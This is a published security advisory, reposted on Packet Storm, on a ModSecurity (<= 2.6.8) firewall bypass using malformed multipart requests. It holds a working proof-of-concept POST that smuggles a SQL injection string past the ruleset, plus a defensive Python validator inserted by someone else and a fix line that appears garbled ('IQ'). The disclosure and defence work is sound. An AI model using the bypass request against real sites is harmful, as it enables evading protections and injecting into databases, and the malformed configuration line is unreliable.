ModSecurity 2.6.8 Bypass

2012-10-17T00:00:00
ID PACKETSTORM:117456
Type packetstorm
Reporter Bernhard Mueller
Modified 2012-10-17T00:00:00

Description

SEC Consult Vulnerability Lab Security Advisory < 20121017-0 >  
=======================================================================  
title: ModSecurity multipart/invalid part ruleset bypass  
product: ModSecurity  
vulnerable version: <= 2.6.8  
fixed version: 2.7.0  
CVE number: -  
impact: Depends what you use it for  
homepage: http://www.modsecurity.org/  
found: 2012-10-12  
by: Bernhard Mueller  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor/product description:  
---------------------------  
ModSecurity for Apache is a web server plug-in for the Apache web server  
platform. This is the original, most mature and deployed ModSecurity module.  
This module is maintained by the Trustwave SpiderLabs Research Team.  
  
URL: http://www.modsecurity.org/projects/modsecurity/apache/  
  
  
Vulnerability overview/description:  
-----------------------------------  
Validation of POST parameters can be bypassed on Apache/PHP installations by  
sending specially formed multipart requests. A POST parameter's content can be  
hidden from ModSecurity by prepending an invalid part. This first part  
contains only a Content-Disposition header and has an additional carriage  
return inserted at the end of the line ([\r\r\n]). This is followed by a  
boundary in the next line and another Content-Disposition header with a  
filename. The request content looks like this (newlines are all \r\n except in  
line 2).  
  
--A  
Content-Disposition: form-data; name="id"[\r][\r][\n]  
--A  
Content-Disposition: form-data; name="lol"; filename="x"  
  
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--  
  
--A--  
  
ModSecurity skips what it believes to be an invalid first part and proceeds to  
parse the second part. This part is treated as a file and not checked against  
the ruleset.  
  
PHP, however, treats the whole thing as a single part and processes only the  
first Content-Disposition header, ignoring the second one. From PHP's point of  
view this request therefore contains a POST parameter with the name given in  
the first header, and its value is the content that ModSecurity never inspected.  
  
  
Proof of concept:  
-----------------  
  
wut.php:  
--------  
  
<?php echo $_POST['xxx']; ?>  
  
  
POST request:  
-------------  
  
POST /wut.php HTTP/1.1  
Content-Type: multipart/form-data; boundary=A  
Content-Length: 161  
  
--A  
Content-Disposition: form-data; name="xxx"[\r][\r][\n]  
--A  
Content-Disposition: form-data; name="yyy"; filename="z"  
  
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--  
  
--A--  
  
  
Output:  
-------  
  
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--  
  
(any change in the header should produce a 403)  
  
  
Vulnerable / tested versions:  
-----------------------------  
  
This works with ModSecurity up to version 2.6.8.  
  
  
Vendor contact timeline:  
------------------------  
2012-10-11: Contacted ModSecurity  
2012-10-15: ModSecurity guys fixed it  
2012-10-16: New ModSecurity release 2.7.0  
2012-10-17: Public release of advisory  
  
  
Solution:  
---------  
To mitigate this bypass method, upgrade to ModSecurity 2.7.0 and make sure  
that the MULTIPART_INVALID_PART flag is set in the multipart strict validation  
rule. Add the line:  
  
IQ %{MULTIPART_INVALID_PART}, \  
  
to the SecRule MULTIPART_STRICT_ERROR in your ModSecurity configuration file.  
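As an added illustration (not part of this advisory and not ModSecurity's or PHP's own code), the sketch below shows the kind of strict check a multipart consumer should apply so that a malformed part like the one above is rejected rather than silently skipped. The sample bodies are constructed here, and the flag names are our own, only loosely modelled on ModSecurity's MULTIPART_* variables.

```python
# Constructed sample bodies (not taken from any real request). POC_BODY mirrors
# the request shown above: the first Content-Disposition line ends in \r\r\n.
BOUNDARY = b"A"
POC_BODY = (
    b"--A\r\n"
    b'Content-Disposition: form-data; name="xxx"\r\r\n'
    b"--A\r\n"
    b'Content-Disposition: form-data; name="yyy"; filename="z"\r\n'
    b"\r\n"
    b"1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--\r\n"
    b"--A--\r\n"
)
GOOD_BODY = (
    b"--A\r\n"
    b'Content-Disposition: form-data; name="xxx"\r\n'
    b"\r\n"
    b"1\r\n"
    b"--A--\r\n"
)


def validate_multipart(body: bytes, boundary: bytes) -> set:
    """Strict check of a multipart/form-data body; returns a set of error flags.

    A strict consumer should reject the request when the set is non-empty rather
    than skip a part it cannot parse, which is what this advisory abuses.
    Flag names are assumed here, not ModSecurity's own.
    """
    errors = set()
    chunks = body.split(b"--" + boundary)
    if len(chunks) < 2:
        return {"MULTIPART_NO_BOUNDARY"}
    for chunk in chunks[1:]:          # chunks[0] is the preamble
        if chunk.startswith(b"--"):
            break                     # closing delimiter "--boundary--"
        if not chunk.startswith(b"\r\n"):
            errors.add("MULTIPART_BAD_BOUNDARY_LINE")  # junk or bare LF after boundary
            continue
        head, sep, _data = chunk[2:].partition(b"\r\n\r\n")
        lines = head.split(b"\r\n")
        for line in lines:
            if b"\r" in line or b"\n" in line:
                # A stray CR/LF inside a header line, e.g. the "\r\r\n" above.
                errors.add("MULTIPART_BARE_CR_IN_HEADER")
        if not sep:
            # Headers never terminated by an empty line, so the part has no body.
            errors.add("MULTIPART_INVALID_PART")
        if not any(l.lower().startswith(b"content-disposition:") for l in lines):
            errors.add("MULTIPART_MISSING_DISPOSITION")
    return errors
```

Run against POC_BODY the validator returns both MULTIPART_BARE_CR_IN_HEADER and MULTIPART_INVALID_PART, while GOOD_BODY yields an empty set; a deny-on-any-flag policy is the equivalent of making MULTIPART_INVALID_PART part of the strict validation rule.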
  
Download is available at:  
  
http://www.modsecurity.org/download/  
  
  
  
Advisory URL:  
--------------  
https://www.sec-consult.com/en/advisories.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
The SEC Consult Group  
  
Office Vienna  
Mooslackengasse 17  
A-1190 Vienna  
Austria  
Tel.: +43 / 1 / 890 30 43 - 0  
Fax.: +43 / 1 / 890 30 43 - 25  
Mail: research at sec-consult dot com  
www.sec-consult.com  
  
  
Office Singapore  
4 Battery Road  
#25-01 Bank of China Building  
Singapore (049908)  
Mail: office at sec-consult dot sg  
  
  
Check out our blog at:  
http://blog.sec-consult.com/  
  
  
And this thing here:  
http://wordpress.org/extend/plugins/mvis-security-center/  
  
  
EOF B. Mueller / October 2012  